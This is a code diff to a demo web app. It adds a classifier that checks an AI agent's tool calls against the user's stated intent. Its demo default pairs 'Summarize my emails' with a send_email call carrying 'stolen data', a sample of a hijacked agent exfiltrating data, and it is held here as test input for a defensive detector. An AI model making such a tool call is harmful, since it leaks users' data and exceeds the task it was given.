Spaces:
Running
Running
bitliu
committed on
Commit
·
5f5c5b7
1
Parent(s):
1ba6507
update
Browse files
Signed-off-by: bitliu <[email protected]>
app.py
CHANGED
|
@@ -100,9 +100,12 @@ MODELS = {
|
|
| 100 |
"🔍 Tool Call Verifier": {
|
| 101 |
"id": "llm-semantic-router/toolcall-verifier",
|
| 102 |
"description": "Token-level verification of tool calls to detect unauthorized actions. Stage 2 defense for tool-calling agents.",
|
| 103 |
-
"type": "
|
| 104 |
"labels": None,
|
| 105 |
-
"demo":
|
|
|
|
|
|
|
|
|
|
| 106 |
},
|
| 107 |
}
|
| 108 |
|
|
@@ -239,6 +242,36 @@ def classify_tokens_simple(text: str, model_id: str) -> list:
|
|
| 239 |
return entities
|
| 240 |
|
| 241 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 242 |
def create_highlighted_html(text: str, entities: list) -> str:
|
| 243 |
"""Create HTML with highlighted entities."""
|
| 244 |
if not entities:
|
|
@@ -335,7 +368,22 @@ def main():
|
|
| 335 |
value=demo["followup"],
|
| 336 |
placeholder="Enter the user's follow-up message...",
|
| 337 |
)
|
| 338 |
-
text_input =
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 339 |
else:
|
| 340 |
# Standard text input for other models
|
| 341 |
text_input = st.text_area(
|
|
@@ -344,7 +392,7 @@ def main():
|
|
| 344 |
height=120,
|
| 345 |
placeholder="Type your text here...",
|
| 346 |
)
|
| 347 |
-
query_input = response_input = followup_input = None
|
| 348 |
|
| 349 |
st.markdown("---")
|
| 350 |
|
|
@@ -378,6 +426,23 @@ def main():
|
|
| 378 |
"followup": followup_input,
|
| 379 |
},
|
| 380 |
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 381 |
elif not text_input.strip():
|
| 382 |
st.warning("Please enter some text to analyze.")
|
| 383 |
else:
|
|
|
|
| 100 |
"🔍 Tool Call Verifier": {
|
| 101 |
"id": "llm-semantic-router/toolcall-verifier",
|
| 102 |
"description": "Token-level verification of tool calls to detect unauthorized actions. Stage 2 defense for tool-calling agents.",
|
| 103 |
+
"type": "toolcall_verifier",
|
| 104 |
"labels": None,
|
| 105 |
+
"demo": {
|
| 106 |
+
"user_intent": "Summarize my emails",
|
| 107 |
+
"tool_call": '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}',
|
| 108 |
+
},
|
| 109 |
},
|
| 110 |
}
|
| 111 |
|
|
|
|
| 242 |
return entities
|
| 243 |
|
| 244 |
|
| 245 |
+
def classify_toolcall_verifier(
    user_intent: str, tool_call: str, model_id: str
) -> tuple:
    """Label every token of a tool call in the context of the user's intent.

    The two inputs are combined into the single prompt
    ``"[USER] {user_intent} [TOOL] {tool_call}"``, tokenized (truncated to at
    most 2048 tokens) and run through the model returned by
    ``load_model(model_id, "token")``. Each token receives the label with
    the highest logit, translated through ``model.config.id2label``.

    Args:
        user_intent: Text placed after the ``[USER]`` marker.
        tool_call: Text placed after the ``[TOOL]`` marker (the UI passes the
            tool call as a JSON string).
        model_id: Model identifier forwarded to ``load_model``.

    Returns:
        A 4-tuple ``(input_text, tokens, labels, unauthorized_tokens)``:
        the formatted prompt, the tokenizer's token strings, the predicted
        label per token, and the ``(token, label)`` pairs whose label is
        exactly ``"UNAUTHORIZED"``.
    """
    tokenizer, model = load_model(model_id, "token")
    id2label = model.config.id2label

    # Format input as per model requirements
    input_text = f"[USER] {user_intent} [TOOL] {tool_call}"

    inputs = tokenizer(
        input_text, return_tensors="pt", truncation=True, max_length=2048
    )

    # Inference only: skip gradient tracking.
    with torch.no_grad():
        outputs = model(**inputs)
        # Highest-scoring class per token; [0] selects the single sequence
        # in the batch.
        predictions = torch.argmax(outputs.logits, dim=-1)[0].tolist()

    # Get tokens and labels (both derived from the same input sequence, so
    # they are parallel lists).
    tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
    labels = [id2label[pred] for pred in predictions]

    # Find unauthorized tokens
    unauthorized_tokens = [
        (token, label)
        for token, label in zip(tokens, labels)
        if label == "UNAUTHORIZED"
    ]

    return input_text, tokens, labels, unauthorized_tokens
|
| 273 |
+
|
| 274 |
+
|
| 275 |
def create_highlighted_html(text: str, entities: list) -> str:
|
| 276 |
"""Create HTML with highlighted entities."""
|
| 277 |
if not entities:
|
|
|
|
| 368 |
value=demo["followup"],
|
| 369 |
placeholder="Enter the user's follow-up message...",
|
| 370 |
)
|
| 371 |
+
text_input = user_intent_input = tool_call_input = None
|
| 372 |
+
elif model_config["type"] == "toolcall_verifier":
|
| 373 |
+
# Tool call verifier needs user intent and tool call
|
| 374 |
+
demo = model_config["demo"]
|
| 375 |
+
user_intent_input = st.text_input(
|
| 376 |
+
"👤 User Intent:",
|
| 377 |
+
value=demo["user_intent"],
|
| 378 |
+
placeholder="Enter the user's original intent...",
|
| 379 |
+
)
|
| 380 |
+
tool_call_input = st.text_area(
|
| 381 |
+
"🔧 Tool Call JSON:",
|
| 382 |
+
value=demo["tool_call"],
|
| 383 |
+
height=120,
|
| 384 |
+
placeholder="Enter the tool call JSON to verify...",
|
| 385 |
+
)
|
| 386 |
+
text_input = query_input = response_input = followup_input = None
|
| 387 |
else:
|
| 388 |
# Standard text input for other models
|
| 389 |
text_input = st.text_area(
|
|
|
|
| 392 |
height=120,
|
| 393 |
placeholder="Type your text here...",
|
| 394 |
)
|
| 395 |
+
query_input = response_input = followup_input = user_intent_input = tool_call_input = None
|
| 396 |
|
| 397 |
st.markdown("---")
|
| 398 |
|
|
|
|
| 426 |
"followup": followup_input,
|
| 427 |
},
|
| 428 |
}
|
| 429 |
+
elif model_config["type"] == "toolcall_verifier":
|
| 430 |
+
if not user_intent_input.strip() or not tool_call_input.strip():
|
| 431 |
+
st.warning("Please fill in both user intent and tool call fields.")
|
| 432 |
+
else:
|
| 433 |
+
with st.spinner("Analyzing..."):
|
| 434 |
+
input_text, tokens, labels, unauthorized = classify_toolcall_verifier(
|
| 435 |
+
user_intent_input, tool_call_input, model_config["id"]
|
| 436 |
+
)
|
| 437 |
+
st.session_state.result = {
|
| 438 |
+
"type": "toolcall_verifier",
|
| 439 |
+
"input_text": input_text,
|
| 440 |
+
"tokens": tokens,
|
| 441 |
+
"labels": labels,
|
| 442 |
+
"unauthorized": unauthorized,
|
| 443 |
+
"user_intent": user_intent_input,
|
| 444 |
+
"tool_call": tool_call_input,
|
| 445 |
+
}
|
| 446 |
elif not text_input.strip():
|
| 447 |
st.warning("Please enter some text to analyze.")
|
| 448 |
else:
|